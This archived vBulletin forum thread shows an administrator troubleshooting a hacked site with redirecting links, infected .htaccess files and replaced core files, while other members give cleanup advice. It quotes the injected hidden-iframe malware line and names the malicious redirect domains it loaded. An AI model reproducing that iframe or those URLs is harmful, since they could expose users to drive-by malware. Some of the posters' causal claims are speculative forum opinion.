vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   Forum hacked (https://vborg.vbsupport.ru/showthread.php?t=293510)

Traxdata 01-02-2013 10:55 AM
Forum hacked
 
My forum was hacked for the first time ever -
buttons and images are not showing,
if I click on links in forums they redirect me to http://breakthrufundraising . com/ezzi.html this site,
have deleted all index.html files on server, all changed files rewrote to originals.
still nothing. any idea???

PS: Can't login to admincp since if I enter my PW my forum redirects me to the above mentioned website. Nothing can be changed.
I have closed forums via .htaccess

Thanks!

ForceHSS 01-02-2013 11:00 AM
link to site?

Traxdata 01-02-2013 11:05 AM
like mentioned I have closed the boards via .htaccess to protect that user pw's (if they login) will be forward.

ForceHSS 01-02-2013 01:43 PM
so without a link to your site that would help someone to find out what has been installed how are we to help you fix this problem. As all you have here is a post telling us you have a problem but no way for us to help you

Brandon Sheley 01-02-2013 01:44 PM
Why did you give us a live link to the guy "hacking" you?
Can you show us a screenshot of your images and buttons not showing, as you said?
Have you checked the server logs, I'd suggest changing your database info and finding out how you where compromised.

In Omnibus 01-02-2013 02:04 PM
Without a link to the site in need of assistance this is more like a spam thread for the link that has been posted.

doctorsexy 01-02-2013 02:13 PM
Watch that link. as it trys to load something..

Traxdata 01-02-2013 02:16 PM
I have two sites, check this one

- when you click on links you will be redirected to another (above mentioned) website. if you click "show image" you will also be redirected tio another website, I talked with my hoster they said someone had my FTP pw's
ok, I have replaced all files on darkshine.de but still not a big change!

--------------- Added [DATE]1357139850[/DATE] at [TIME]1357139850[/TIME] ---------------

changed the link

--------------- Added [DATE]1357139926[/DATE] at [TIME]1357139926[/TIME] ---------------

Quote:
Originally Posted by doctorsexy (Post 2394215)
Watch that link. as it trys to load something..
changed the link

--------------- Added [DATE]1357140311[/DATE] at [TIME]1357140311[/TIME] ---------------

They added to all my .html files this:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo . com/hzws.html>;</iframe>
Have deleted all the files and replaced with new files - not helped!

Searched for
%base64% %iframe%
in phpmyadmin

nothing suspicious found.

--------------- Added [DATE]1357140482[/DATE] at [TIME]1357140482[/TIME] ---------------

All the pictures from my server are not showing up neither on my sites nor on other places I have posted them!
Only if I click on "copy address for image" and paste in url bar I can see them.

Simon Lloyd 01-02-2013 02:40 PM
My antivirus wouldn't allow your site to load!

Traxdata 01-02-2013 02:46 PM
Yes, a big help, thx!

In Omnibus 01-02-2013 02:49 PM
Are you able to login to the AdminCP directly using admincp/index.php?

Traxdata 01-02-2013 02:52 PM
no way,
since I have to enter my pw and when I click on continue...redirecting to this stupid website.

have access only with ftp, phpmyadmin or ssh

Like I said, my other website is not a forum, so no database, has nbothng to do with vbulletin, only .html and .jpg files.
I have replaced ALL .html files and some .jpg but still cant see the pictures and still redirecting active, talked to hoster - nothing suspicious (malware/trojaner) found on server.

In Omnibus 01-02-2013 02:55 PM
Are you able to access the AdminCP using tools.php?

--------------- Added [DATE]1357142189[/DATE] at [TIME]1357142189[/TIME] ---------------

The first thing I would do is to replace the index.php file with the default file. You should be able to do that much via FTP.

Traxdata 01-02-2013 02:57 PM
never tried, do I have to login on tools.php? if so, then no way.

--------------- Added [DATE]1357143095[/DATE] at [TIME]1357143095[/TIME] ---------------

no way, it asks for member# and redirects to another website,

Simon Lloyd 01-02-2013 03:41 PM
It seems to me that one or more of your core files hasn't been overwritten, you will also have a file or two which doesn't belong in your forum root which is rewriting the infection every time it doesn't see it, my suggestion would be to rename your forum folder add a new folder then name it to what your forum folder was, upload all fresh files (with the install/install.php deleted and the config.php.new edited for your database and renamed to config.php) and then try to access, if you can then you need to search your old folder for files that shouldn't be there, delete them, then upload with overwrite via ftp in ascii mode your fresh files in to the renamed folder, rename the temp folder to something else and then rename your old folder back to it's original and see how you go.

Traxdata 01-02-2013 03:56 PM
The problem found, it was also infected .htaccess file in www, I have added one in root but not in www............... shame on me.

. so if one of you will ge the same issue.

But still - it were about 10 infected vbulletin files - you have to delete them, you can easily find them but checking the date - the older and not changed ones are harmful, only recently changed you have to delete and replace with old original files.

The problem came with Filezilla, it seems to be well known problem, I would recommend to login with SFTP and not with FTP if using Filezilla and then changing all the PWs.

--------------- Added [DATE]1357146302[/DATE] at [TIME]1357146302[/TIME] ---------------

Quote:
Originally Posted by Simon Lloyd (Post 2394245)
It seems to me that one or more of your core files hasn't been overwritten, you will also have a file or two which doesn't belong in your forum root which is rewriting the infection every time it doesn't see it, my suggestion would be to rename your forum folder add a new folder then name it to what your forum folder was, upload all fresh files (with the install/install.php deleted and the config.php.new edited for your database and renamed to config.php) and then try to access, if you can then you need to search your old folder for files that shouldn't be there, delete them, then upload with overwrite via ftp in ascii mode your fresh files in to the renamed folder, rename the temp folder to something else and then rename your old folder back to it's original and see how you go.
YEs, it was the first I did, I deleted and replaced all recently changed files (.php), all index.html and other .html files, and have created new .htaccess but did not in www, it was such waste of time! I could be ready within 10 minutes.

Database was not effected - thankfully!!! since it could take ages to restore.

Amaury 01-02-2013 04:08 PM
I'd suggest filing a ticket so vBulletin can help.

Also, which version of vBulletin 3 are you running?

Simon Lloyd 01-02-2013 04:20 PM
Quote:
Originally Posted by Traxdata (Post 2394249)
The problem came with Filezilla, it seems to be well known problem, I would recommend to login with SFTP and not with FTP if using Filezilla and then changing all the PWs.
Thats possible because filezilla stores your passwords as plain text, however, the passwords will not have been transmitted elsewhere by filezilla but rather you have/had an infection on your own pc that's found and relayed these.

--------------- Added [DATE]1357147387[/DATE] at [TIME]1357147387[/TIME] ---------------

One other thing, if your .htaccess was infected then thats not an issue with vbulletin but more with a server vulnerability as only you or your server control panel can affect the .htaccess.

Max Taxable 01-02-2013 04:23 PM
Quote:
Originally Posted by Simon Lloyd (Post 2394254)
Thats possible because filezilla stores your passwords as plain text, however, the passwords will not have been transmitted elsewhere by filezilla but rather you have/had an infection on your own pc that's found and relayed these.
Couldn't thank the post so, thanks here! You are 100% correct.

Simon Lloyd 01-02-2013 04:31 PM
You're too kind :), although this is sadly true in so many "i've been hacked" cases, we're all guilty of some security faux pas at sometime or another and only realise it when our world seems like it's caved in!

Traxdata 01-02-2013 04:52 PM
I ran vb since 07/2004, and it was for the first time, I know how to spell -security-.

if it will happen to someone - search for .htaccess files on your whole server (via ssh or sftp), they will be everywhere in vb folders. you have to delete them all.

ForceHSS 01-02-2013 04:55 PM
Quote:
Originally Posted by Traxdata (Post 2394267)
I ran vb since 06/2004, and it was for the first time, I know how to spell -security-.
you get all this help then you say that

In Omnibus 01-02-2013 04:59 PM
Quote:
Originally Posted by Simon Lloyd (Post 2394259)
You're too kind :), although this is sadly true in so many "i've been hacked" cases, we're all guilty of some security faux pas at sometime or another and only realise it when our world seems like it's caved in!
Which is why responsible administrators backup their forums at least once daily and to multiple locations.

doctorsexy 01-02-2013 05:58 PM
I'd suggest getting some Av for your Pc..

Max Taxable 01-02-2013 07:05 PM
Quote:
Originally Posted by Traxdata (Post 2394267)
I ran vb since 07/2004, and it was for the first time, I know how to spell -security-.

if it will happen to someone - search for .htaccess files on your whole server (via ssh or sftp), they will be everywhere in vb folders. you have to delete them all.
Clean your own registry first, friend. Start with this utility:

http://www.mcafee.com/apps/free-tool...s/stinger.aspx


All times are GMT. The time now is 05:49 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01195 seconds
  • Memory Usage 1,791KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (7)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (25)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete